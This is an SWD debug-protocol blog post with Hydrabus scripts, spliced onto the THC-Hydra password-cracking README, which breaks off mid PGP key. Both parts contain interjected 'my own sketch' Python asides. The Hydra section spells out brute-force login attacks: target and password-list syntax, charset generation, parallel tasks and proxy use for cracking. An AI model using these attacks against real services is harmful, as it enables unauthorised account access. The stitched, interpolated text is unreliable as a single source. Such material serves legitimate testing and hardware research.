SWD – ARM's alternative to JTAG
May 16, 2019 | Nicolas Oberli | Embedded

For embedded developers and hardware hackers, JTAG is the de facto standard for debugging and accessing microprocessor registers. This protocol has been in use for many years and is still in use today. Its main drawback is that it uses a lot of signals to work (at least four: TCK, TMS, TDI, TDO). This has become a problem now that devices have gotten smaller and smaller and low pin count microcontrollers are available. To address this, ARM created an alternative debug interface called SWD (Serial Wire Debug) that only uses two signals (SWDCLK and SWDIO). This interface and its associated protocol are now available in nearly all Cortex-[A,R,M] processors.

ARM Debug Interface

Architecture overview

Contrary to JTAG, which chains TAPs together, SWD uses a bus called the DAP (Debug Access Port). On this DAP, there is one master (the DP, or Debug Port) and one or more slaves (APs, or Access Ports), similar to JTAG TAPs. The DP communicates with the APs using packets that contain the AP address. To sum this up, an external debugger connects to the DAP via the DP using a protocol called SWD. This whitepaper from ARM gives a nice overview of the SWD architecture.

Debug ports

The Debug Port is the interface between the host and the DAP. It also handles the host interface. There are three different Debug Ports available to access the DAP:

- JTAG Debug Port (JTAG-DP). This port uses the standard JTAG interface and protocol to access the DAP.
- Serial Wire Debug Port (SW-DP). This port uses the SWD protocol to access the DAP.
- Serial Wire / JTAG Debug Port (SWJ-DP). This port can use either JTAG or SWD to access the DAP. It is a common interface found on many microcontrollers. It reuses the TMS and TCK JTAG signals to carry the SWDIO and SWDCLK signals respectively. A specific sequence has to be sent in order to switch from one interface to the other.
Access Ports

Multiple APs can be added to the DAP, depending on the needs. ARM provides specifications for two APs:

- Memory Access Port (MEM-AP). This AP provides access to the core memory and registers.
- JTAG Access Port (JTAG-AP). This AP allows connecting a JTAG chain to the DAP.

SWD protocol

Signaling

As said earlier, SWD uses only two signals:

- SWDCLK. The clock signal, sent by the host. As there is no relation between the processor clock and the SWD clock, the frequency selection is up to the host interface. According to this KB article, the maximum debug clock frequency is about 60MHz, but it varies in practice.
- SWDIO. The bidirectional signal carrying the data from/to the DP. The data is set by the host during the rising edge and sampled by the DP during the falling edge of the SWDCLK signal.

Both lines should be pulled up on the target.

Transactions

Each SWD transaction has three phases:

- Request phase. 8 bits sent by the host.
- ACK phase. 3 bits sent by the target.
- Data phase. Up to 32 bits sent from/to the host, followed by a parity bit.

Note that a Trn cycle has to be inserted whenever the data direction changes.

Request

The request header contains the following fields:

| Field  | Description                                                     |
|--------|-----------------------------------------------------------------|
| Start  | Start bit. Should be 1                                          |
| APnDP  | Access to DP (0) or AP (1)                                      |
| RnW    | Write (0) or Read (1) request                                   |
| A[2:3] | AP or DP register address bits [2:3]                            |
| Parity | Even parity over (APnDP, RnW, A[2:3])                           |
| Stop   | Stop bit. Should be 0                                           |
| Park   | Park bit sent before changing SWDIO to open-drain. Should be 1  |

ACK

The ACK bits contain the acknowledge status of the request header. Note that the three bits must be read LSB first:

| Bit | Description                            |
|-----|----------------------------------------|
| 0   | OK response. Operation was successful  |
| 1   | WAIT response. Host must retry         |
| 2   | FAULT response. An error has occurred  |

Data

The data is sent either by the host or the target. It is sent LSB first and ends with an even parity bit.

Protocol interaction

Now that we know more about the low-level part of the protocol, it's time to interact with an actual target.
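Before moving on to real hardware, the header encoding above can be made concrete in a few lines of Python. This is my own sketch, not code from the article; it packs the request fields into the byte that gets shifted out LSB first, and it reproduces the request bytes (0xa5, 0xb1, 0x9f) used by the scripts later in this post.

```python
def swd_request(apndp, rnw, addr):
    """Build the 8-bit SWD request header as the byte shifted out
    LSB first (Start bit first).

    apndp: 0 = DP access, 1 = AP access
    rnw:   0 = write, 1 = read
    addr:  register address; bits [3:2] become A[2:3]
    """
    a2 = (addr >> 2) & 1
    a3 = (addr >> 3) & 1
    parity = apndp ^ rnw ^ a2 ^ a3          # even parity over the four bits
    bits = [1, apndp, rnw, a2, a3, parity, 0, 1]  # Start .. Park
    value = 0
    for i, b in enumerate(bits):
        value |= b << i                     # bit 0 is transmitted first
    return value

# ACK field, read LSB first: the first bit on the wire is the OK flag
ACK = {0b001: "OK", 0b010: "WAIT", 0b100: "FAULT"}
```

For example, a DP read of register 0x0 (DPIDR) encodes to 0xa5, a DP write to register 0x8 (SELECT) to 0xb1, and an AP read of offset 0xc to 0x9f.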
In order to do so, I used a Hydrabus, but this can also be done using a Bus Pirate or any other similar tool. During this experiment, I used an STM32F103 development board, nicknamed the Blue Pill. It is easily available and already has an SWD connector. The ARM Debug Interface Architecture Specification document contains all the details needed to interact with the SWD interface, so let's get started.

SWD initialization

As the target uses an SWJ-DP interface, it needs to be switched from the default JTAG mode to SWD. Chapter 5.2.1 of the document shows the sequence to be sent to switch from JTAG to SWD:

1. Send at least 50 SWCLKTCK cycles with SWDIOTMS HIGH. This ensures that the current interface is in its reset state. The JTAG interface only detects the 16-bit JTAG-to-SWD sequence starting from the Test-Logic-Reset state.
2. Send the 16-bit JTAG-to-SWD select sequence on SWDIOTMS.
3. Send at least 50 SWCLKTCK cycles with SWDIOTMS HIGH. This ensures that if SWJ-DP was already in SWD operation before sending the select sequence, the SWD interface enters line reset state.

The sequence being 0b0111 1001 1110 0111 (0x79e7) MSB first, we need to use 0x7b 0x9e in LSB-first format.

import pyHydrabus

r = pyHydrabus.RawWire('/dev/ttyACM0')
r._config = 0xa  # Set GPIO open-drain / LSB first
r._configure_port()
r.write(b'\xff\xff\xff\xff\xff\xff\x7b\x9e\xff\xff\xff\xff\xff\xff')

Now that the DP is in reset state, we can issue a DPIDR read command to identify the Debug Port. To do so, we need to read the DP register at address 0x00:

| Start | APnDP | RnW | A[2:3] | Parity | Stop | Park |
|-------|-------|-----|--------|--------|------|------|
| 1     | 0     | 1   | 0 0    | 1      | 0    | 1    |

= 0xa5

r.write(b'\x0f\x00\xa5')
status = 0
for i in range(3):
    status += ord(r.read_bit()) << i
print("Status: ", hex(status))
print("DPIDR", hex(int.from_bytes(r.read(4), byteorder="little")))

Next step is to power up the debug domain.
Chapter 2.4.5 tells us that we need to set CDBGPWRUPREQ and CSYSPWRUPREQ (bits 28 and 30) in the CTRL/STAT register (address 0x4) of the DP:

r.write(b'\x81')  # Write request to DP register address 0x4
for _ in range(5):
    r.read_bit()  # Do not take care of the response
# Write 0x00000078-MSB in the CTRL/STAT register
r.write(b'\x1e\x00\x00\x00\x00')
# Send some clock cycles to sync up the line
r.write(b'\x00')

SWD usage

Now that the debug power domain is up, the DAP is fully accessible. As a first discovery process, we will query an AP, then scan for all APs on the DAP.

Reading from an AP

Reading from an AP is always done via the DP. To query an AP, the host must tell the DP to write to an AP specified by an address on the DAP. To read the data from a previous transaction, the DP uses a special register called RDBUFF (address 0xc). This means that the correct query method is the following:

1. Write to the DP SELECT register, setting the APSEL and APBANKSEL fields.
2. Read the DP RDBUFF register once to "commit" the last transaction.
3. Read the RDBUFF register again to read its actual value.

The SELECT register is described in chapter 2.3.9; the interesting fields are noted here:

| Field     | Position | Description                                                 |
|-----------|----------|-------------------------------------------------------------|
| APSEL     | [31:24]  | Selects the AP address. There are up to 256 APs on the DAP. |
| APBANKSEL | [7:4]    | Selects the AP register bank to query.                      |

In our case, we will query the IDR register to identify the AP type. One interesting AP register to read is the IDR register (in bank 0xf), which contains the identification information for this AP. The code below sums up the procedure to read the IDR of the AP at address 0x0.

ap = 0  # AP address
r.write(b'\xb1')  # Write to DP SELECT register
for _ in range(5):
    r.read_bit()  # Don't read the status bits
r.write(b'\xf0\x00\x00')  # Fill APBANKSEL with 0xf
r.write(ap.to_bytes(1, byteorder="little"))  # Fill APSEL with the AP address
# This calculates the parity bit to be sent after the data phase
if (bin(ap).count('1') % 2) == 0:
    r.write(b'\x00')
else:
    r.write(b'\x01')
r.write(b'\x9f')  # Read RDBUFF from DP
status = 0
for i in range(3):
    status += ord(r.read_bit()) << i  # Read transaction status
print("Status: ", hex(status))
# Dummy read to "commit" the transaction
r.read(4)
r.write(b'\x00')
r.write(b'\x9f')  # Read RDBUFF from DP, this time for real
status = 0
for i in range(3):
    status += ord(r.read_bit()) << i
print("Status: ", hex(status))
idcode = hex(int.from_bytes(r.read(4), byteorder="little"))  # Read actual value
if idcode != '0x0':  # If no AP is present, the value will be 0
    print("AP", hex(ap), idcode)
r.write(b'\x00')

Scanning for APs

With the exact same code, we can iterate over the whole address space and see if there are any other APs on the DAP:

for ap in range(0x100):
    r.write(b'\x00')
    r.write(b'\xb1')
    for _ in range(5):
        r.read_bit()
    r.write(b'\xf0\x00\x00')
    r.write(ap.to_bytes(1, byteorder="little"))
    if (bin(ap).count('1') % 2) == 0:
        r.write(b'\x00')
    else:
        r.write(b'\x01')
    r.write(b'\x9f')
    status = 0
    for i in range(3):
        status += ord(r.read_bit()) << i
    r.read(4)
    r.write(b'\x00')
    r.write(b'\x9f')
    status = 0
    for i in range(3):
        status += ord(r.read_bit()) << i
    idcode = hex(int.from_bytes(r.read(4), byteorder="little"))
    if idcode != '0x0':
        print("AP", hex(ap), idcode)

Running the script shows that there is only one AP on the bus.
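As an aside, the SELECT value these scripts shift out can be sanity-checked in isolation. This is my own sketch based on the field layout given above (APSEL in [31:24], APBANKSEL in [7:4]), not code from the article:

```python
def dp_select(apsel, apbanksel):
    """Compose the DP SELECT register value from its two fields."""
    return ((apsel & 0xFF) << 24) | ((apbanksel & 0xF) << 4)

def select_bytes(apsel, apbanksel):
    """The 32-bit data word as sent on the wire, LSB first."""
    return dp_select(apsel, apbanksel).to_bytes(4, byteorder="little")
```

For APBANKSEL = 0xf this yields the bytes 0xf0 0x00 0x00 followed by the AP address, which is exactly what the script writes.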
According to the documentation, it is the MEM-AP:

> python3 /tmp/swd.py
Status: 0x1
DPIDR 0x2ba01477
AP 0x0 0x24770011

From here, it is possible to send commands to the MEM-AP to query the processor memory.

Discovering SWD pins

On real devices, it is not always easy to determine which pins or testpoints are used for the debug interface. This is also true for JTAG, which is why tools like the JTAGulator exist. Its purpose is to discover JTAG interfaces by trying every pin combination until one returns a valid IDCODE. Now that we know better how an SWD interface is initialized, we can do much the same for SWD interfaces. The idea is the following:

1. Take a number of interesting pins on a target board
2. Wire them up to the SWD discovery device
3. Select two pins on the SWD discovery device as SWDCLK and SWDIO
4. Send the SWD initialization sequence
5. Read the status response and the DPIDR register
6. If the results are valid, print the solution
7. If not, go back to step 3 and select two new pins

This method has been implemented in the Hydrabus firmware, and so far it brings positive results. An example session is displayed here:

> 2-wire
Device: twowire1
GPIO resistor: floating
Frequency: 1000000Hz
Bit order: MSB first
twowire1> brute 8
Bruteforce on 8 pins.
Device found. IDCODE : 2BA01477
CLK: PB5 IO: PB6
twowire1>

The operation takes less than two seconds, and it has reliably discovered the SWD interfaces on all boards tested so far.

Conclusions

In this post we showed how the ARM debug interface is designed and how the SWD protocol works at a very low level. With this information, it is possible to send queries to the MEM-AP using a simple microcontroller. That goes far beyond the purpose of this post and will not be covered here; the PySWD library is a helpful resource to start interacting with the MEM-AP. We also showed how to implement an SWD detection tool to help find SWD ports, similar to existing tools used for JTAG detection.
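As a closing illustration, the pin-discovery loop described in "Discovering SWD pins" boils down to probing every ordered pin pair. The sketch below is mine, not the Hydrabus firmware; the try_swd callback is hypothetical and stands in for "send the init sequence, then read DPIDR":

```python
from itertools import permutations

def candidate_pin_pairs(pins):
    """Ordered (clk, io) pairs: SWDCLK and SWDIO are not interchangeable."""
    return list(permutations(pins, 2))

def bruteforce_swd(pins, try_swd):
    """try_swd(clk, io) returns a DPIDR value, or 0 when nothing answers."""
    for clk, io in candidate_pin_pairs(pins):
        idcode = try_swd(clk, io)
        if idcode:  # a non-zero DPIDR means a live SWD port
            return clk, io, idcode
    return None
```

On 8 pins this is only 8 × 7 = 56 combinations, which is consistent with a scan completing in under two seconds.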
Source: https://research.kudelskisecurity.com/2019/05/16/swd-arms-alternative-to-jtag/
-
INTRODUCTION

The number one security hole is passwords, as every password security study shows. This tool is proof-of-concept code, giving researchers and security consultants the possibility to show how easy it would be to gain unauthorized remote access to a system.

THIS TOOL IS FOR LEGAL PURPOSES ONLY!

There are already several login hacker tools available; however, none supports more than one protocol to attack or supports parallelized connects.

It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and MacOS.

Currently this tool supports the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

However, the module engine for new services is very easy, so it won't take long until even more services are supported. Your help in writing, enhancing or fixing modules is highly appreciated!!

WHERE TO GET

You can always find the newest release/production version of hydra at its project page at https://github.com/vanhauser-thc/thc-hydra/releases
If you are interested in the current development state, the public development repository is at GitHub:
svn co https://github.com/vanhauser-thc/thc-hydra
or
git clone https://github.com/vanhauser-thc/thc-hydra
Use the development version at your own risk. It contains new features and new bugs. Things might not work!
HOW TO COMPILE

To configure, compile and install hydra, just type:

./configure
make
make install

If you want the ssh module, you have to set up libssh (not libssh2!) on your system; get it from http://www.libssh.org. For ssh v1 support you also need to add the "-DWITH_SSH1=On" option to the cmake command line.
IMPORTANT: If you compile on MacOS then you must do this - do not install libssh via brew!

If you use Ubuntu/Debian, this will install supplementary libraries needed for a few optional modules (note that some might not be available on your distribution):

apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev \
  libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev \
  firebird-dev libmemcached-dev

This enables all optional modules and features with the exception of Oracle, SAP R/3, NCP and the Apple Filing Protocol, which you will need to download and install from the vendors' web sites.

For all other Linux derivatives and BSD-based systems, use the system software installer and look for similarly named libraries as in the command above. In all other cases, you have to download all source libraries and compile them manually.

SUPPORTED PLATFORMS

- All UNIX platforms (Linux, *BSD, Solaris, etc.)
- MacOS (basically a BSD clone)
- Windows with Cygwin (both IPv4 and IPv6)
- Mobile systems based on Linux, MacOS or QNX (e.g. Android, iPhone, Blackberry 10, Zaurus, iPaq)

HOW TO USE

If you just enter hydra, you will see a short summary of the important options available. Type ./hydra -h to see all available command line options.

Note that NO login/password file is included. Generate them yourself. A default password list is however present; use "dpl4hydra.sh" to generate a list.
For Linux users, a GTK GUI is available; try ./xhydra

For command line usage, the syntax is as follows.

For attacking one target or a network, you can use the new "://" style:

hydra [some command line options] PROTOCOL://TARGET:PORT/MODULE-OPTIONS

The old mode can be used for these too, and additionally, if you want to specify your targets from a text file, you must use this one:

hydra [some command line options] [-s PORT] TARGET PROTOCOL [MODULE-OPTIONS]

Via the command line options you specify which logins to try, which passwords, if SSL should be used, how many parallel tasks to use for attacking, etc.

PROTOCOL is the protocol you want to use for attacking, e.g. ftp, smtp, http-get or one of the many others available
TARGET is the target you want to attack
MODULE-OPTIONS are optional values which are special per PROTOCOL module

FIRST - select your target

You have three options on how to specify the target you want to attack:
- a single target on the command line: just put the IP or DNS address in
- a network range on the command line: CIDR specification like "192.168.0.0/24"
- a list of hosts in a text file: one line per entry (see below)

SECOND - select your protocol

Try to avoid telnet, as it is unreliable in detecting a correct or false login attempt. Use a port scanner to see which protocols are enabled on the target.

THIRD - check if the module has optional parameters

hydra -U PROTOCOL
e.g. hydra -U smtp

FOURTH - the destination port

This is optional! If no port is supplied, the default common port for the PROTOCOL is used. If you specify SSL to be used ("-S" option), the SSL common port is used by default.

If you use the "://" notation, you must use "[" "]" brackets if you want to supply IPv6 addresses or CIDR ("192.168.0.0/24") notations to attack:

hydra [some command line options] ftp://[192.168.0.0/24]/
hydra [some command line options] -6 smtps://[2001:db8::1]/NTLM

Note that by default everything hydra does is IPv4 only!
If you want to attack IPv6 addresses, you must add the "-6" command line option. All attacks are then IPv6 only!

If you want to supply your targets via a text file, you can not use the "://" notation but must use the old style, just supplying the protocol (and module options):

hydra [some command line options] -M targets.txt ftp

You can also supply the port for each target entry by adding ":" after a target entry in the file, e.g.:

foo.bar.com
target.com:21
unusual.port.com:2121
default.used.here.com
127.0.0.1
127.0.0.1:2121

Note that if you want to attack IPv6 targets, you must supply the -6 option and must put the IPv6 addresses in brackets in the file(!) like this:

foo.bar.com
target.com:21
[fe80::1%eth0]
[2001::1]
[2002::2]:8080
[2a01:24a:133:0:00:123:ff:1a]

LOGINS AND PASSWORDS

You have many options for how to attack with logins and passwords.
With -l for login and -p for password you tell hydra that this is the only login and/or password to try.
With -L for logins and -P for passwords you supply text files with entries, e.g.:

hydra -l admin -p password ftp://localhost/
hydra -L default_logins.txt -p test ftp://localhost/
hydra -l admin -P common_passwords.txt ftp://localhost/
hydra -L logins.txt -P passwords.txt ftp://localhost/

Additionally, you can try passwords based on the login via the "-e" option. The "-e" option has three parameters:

s - try the login as password
n - try an empty password
r - reverse the login and try it as password

If you want to, e.g., try "login as password" and "empty password", you specify "-e sn" on the command line.

But there are two more modes for trying passwords than -p/-P:
You can use a text file where a login and password pair is separated by a colon, e.g.:

admin:password
test:test
foo:bar

This is a common default account style listing, as also generated by the dpl4hydra.sh default account file generator supplied with hydra.
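To make these password-generation rules concrete, here is a small Python model of my own (not hydra's actual code; the ordering of candidates is my choice). It covers the "-e" expansion, the "-x" charset rules described further down, and the colon-separated listing just shown:

```python
import string

def e_option_candidates(login, modes):
    """Model the -e option: n = empty password, s = login as
    password, r = reversed login."""
    out = []
    if "n" in modes:
        out.append("")
    if "s" in modes:
        out.append(login)
    if "r" in modes:
        out.append(login[::-1])
    return out

def expand_charset(spec):
    """Model the -x charset rules: 'a' -> a-z, 'A' -> A-Z,
    '1' -> 0-9, any other character stands for itself."""
    chars = []
    for c in spec:
        if c == "a":
            chars += string.ascii_lowercase
        elif c == "A":
            chars += string.ascii_uppercase
        elif c == "1":
            chars += string.digits
        else:
            chars.append(c)
    return "".join(dict.fromkeys(chars))  # de-duplicate, keep order

def bruteforce_space(minlen, maxlen, spec):
    """Number of candidates a -x minlen:maxlen:spec run generates."""
    n = len(expand_charset(spec))
    return sum(n ** length for length in range(minlen, maxlen + 1))

def parse_colon_file(lines):
    """Split 'login:password' pairs as found in a default-account listing."""
    return [tuple(line.split(":", 1)) for line in lines if line.strip()]
```

For instance, "-x 1:3:a" amounts to 26 + 26² + 26³ = 18,278 candidates. The colon-separated listing above parses into (login, password) pairs; hydra consumes such files with the -C option, described next.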
You use such a text file with the -C option; note that in this mode you can not use the -l/-L/-p/-P options (-e nsr however you can). Example:

hydra -C default_accounts.txt ftp://localhost/

And finally, there is a bruteforce mode with the -x option (which you can not use with -p/-P/-C):

-x minimum_length:maximum_length:charset

In the charset definition, "a" stands for lowercase letters, "A" for uppercase letters, "1" for numbers, and anything else you supply stands for its real representation. Examples:

-x 1:3:a   generate passwords of length 1 to 3 with all lowercase letters
-x 2:5:/   generate passwords of length 2 to 5 containing only slashes
-x 5:8:A1  generate passwords of length 5 to 8 with uppercase letters and numbers

Example:

hydra -l ftp -x 3:3:a ftp://localhost/

SPECIAL OPTIONS FOR MODULES

Via the third command line parameter (TARGET SERVICE OPTIONAL) or the -m command line option, you can pass one option to a module. Many modules use this, a few require it! To see the special option of a module, type:

hydra -U PROTOCOL
e.g. ./hydra -U http-post-form

The special options can be passed via the -m parameter, as the third command line option, or in the service://target/option format.

Examples (they are all equal):

./hydra -l test -p test -m PLAIN 127.0.0.1 imap
./hydra -l test -p test 127.0.0.1 imap PLAIN
./hydra -l test -p test imap://127.0.0.1/PLAIN

RESTORING AN ABORTED/CRASHED SESSION

When hydra is aborted with Control-C, killed or crashes, it leaves a "hydra.restore" file behind which contains all necessary information to restore the session. This session file is written every 5 minutes.
NOTE: the hydra.restore file can NOT be copied to a different platform (e.g. from little endian to big endian, or from Solaris to AIX).

HOW TO SCAN/CRACK OVER A PROXY

The environment variable HYDRA_PROXY_HTTP defines the web proxy (this works just for the http services!).
The following syntax is valid:

HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
HYDRA_PROXY_HTTP="http://login:password@123.45.67.89:8080/"
HYDRA_PROXY_HTTP="proxylist.txt"

The last example is a text file containing up to 64 proxies (in the same format definition as the other examples).

For all other services, use the HYDRA_PROXY variable to scan/crack. It uses the same syntax, e.g.:

HYDRA_PROXY=[connect|socks4|socks5]://[login:password@]proxy_addr:proxy_port

For example:

HYDRA_PROXY=connect://proxy.anonymizer.com:8000
HYDRA_PROXY=socks4://auth:pw@127.0.0.1:1080
HYDRA_PROXY=socksproxylist.txt

ADDITIONAL HINTS

- Sort your password files by likelihood and use the -u option to find passwords much faster!
- uniq your dictionary files! This can save you a lot of time:
  cat words.txt | sort | uniq > dictionary.txt
- If you know that the target is using a password policy (allowing users only to choose a password with a minimum length of 6, containing at least one letter and one number, etc.), use the tool pw-inspector, which comes along with the hydra package, to reduce the password list:
  cat dictionary.txt | pw-inspector -m 6 -c 2 -n > passlist.txt

RESULTS OUTPUT

The results are written to stdout along with the other information. Via the -o command line option, the results can also be written to a file. Using -b, the format of the output can be specified. Currently, these are supported:

text - plain text format
jsonv1 - JSON data using version 1.x of the schema (defined below)
json - JSON data using the latest version of the schema; currently there is only version 1

If using JSON output, the results file may not be valid JSON if there are serious errors in booting Hydra.

JSON Schema

Here is an example of the JSON output. Notes on some of the fields:

errormessages - an array of zero or more strings that are normally printed to stderr at the end of Hydra's run. The text is very free form.
success - indication of whether Hydra ran correctly without error (NOT whether passwords were detected).
This parameter is either the JSON value true or false depending on completion.
quantityfound - how many username+password combinations were discovered.
jsonoutputversion - version of the schema: 1.00, 1.01, 1.11, 2.00, 2.03, etc. Hydra will make the second tuple of the version always be two digits to make it easier for downstream processors (as opposed to v1.1 vs v1.10). The minor-level versions are additive, so 1.02 will contain more fields than version 1.00 and will be backward compatible. Version 2.x will break something from version 1.x output.

Version 1.00 example:

{
    "errormessages": [
        "[ERROR] Error Message of Something",
        "[ERROR] Another Message",
        "These are very free form"
    ],
    "generator": {
        "built": "2019-03-01 14:44:22",
        "commandline": "hydra -b jsonv1 -o results.json ... ...",
        "jsonoutputversion": "1.00",
        "server": "127.0.0.1",
        "service": "http-post-form",
        "software": "Hydra",
        "version": "v8.5"
    },
    "quantityfound": 2,
    "results": [
        {
            "host": "127.0.0.1",
            "login": "bill@example.com",
            "password": "bill",
            "port": 9999,
            "service": "http-post-form"
        },
        {
            "host": "127.0.0.1",
            "login": "joe@example.com",
            "password": "joe",
            "port": 9999,
            "service": "http-post-form"
        }
    ],
    "success": false
}

SPEED

Through the parallelizing feature, this password cracker tool can be very fast; however, it depends on the protocol. The fastest are generally POP3 and FTP. Experiment with the task option (-t) to speed things up! The higher, the faster (but too high, and it disables the service).

STATISTICS

Run against a SuSE Linux 7.2 on localhost with a "-C FILE" containing 295 entries (294 invalid login attempts, 1 valid). Every test was run three times (only for "1 task" just once), and the average noted down.
                    P A R A L L E L    T A S K S
SERVICE     1      4      8      16     32     50     64     100    128
-------  --------------------------------------------------------------------
telnet   23:20   5:58   2:58   1:34   1:05   0:33   0:45*  0:25*  0:55*
ftp      45:54  11:51   5:54   3:06   1:25   0:58   0:46   0:29   0:32
pop3     92:10  27:16  13:56   6:42   2:55   1:57   1:24   1:14   0:50
imap     31:05   7:41   3:51   1:58   1:01   0:39   0:32   0:25   0:21

Note: telnet timings can be VERY different for 64 to 128 tasks! e.g. with 128 tasks, running four times resulted in timings between 28 and 97 seconds! The reason for this is unknown...

guesses per task (rounded up):

         295     74     38     19     10     6      5      3      3

guesses possible per connect (depends on the server software and config):

telnet 4
ftp 6
pop3 1
imap 3

BUGS & FEATURES

Hydra: Email me or David if you find bugs or if you have written a new module. vh@thc.org (and put "antispam" in the subject line)

You should use PGP to encrypt emails to vh@thc.org:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v3.3.3 (vh@thc.org)

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
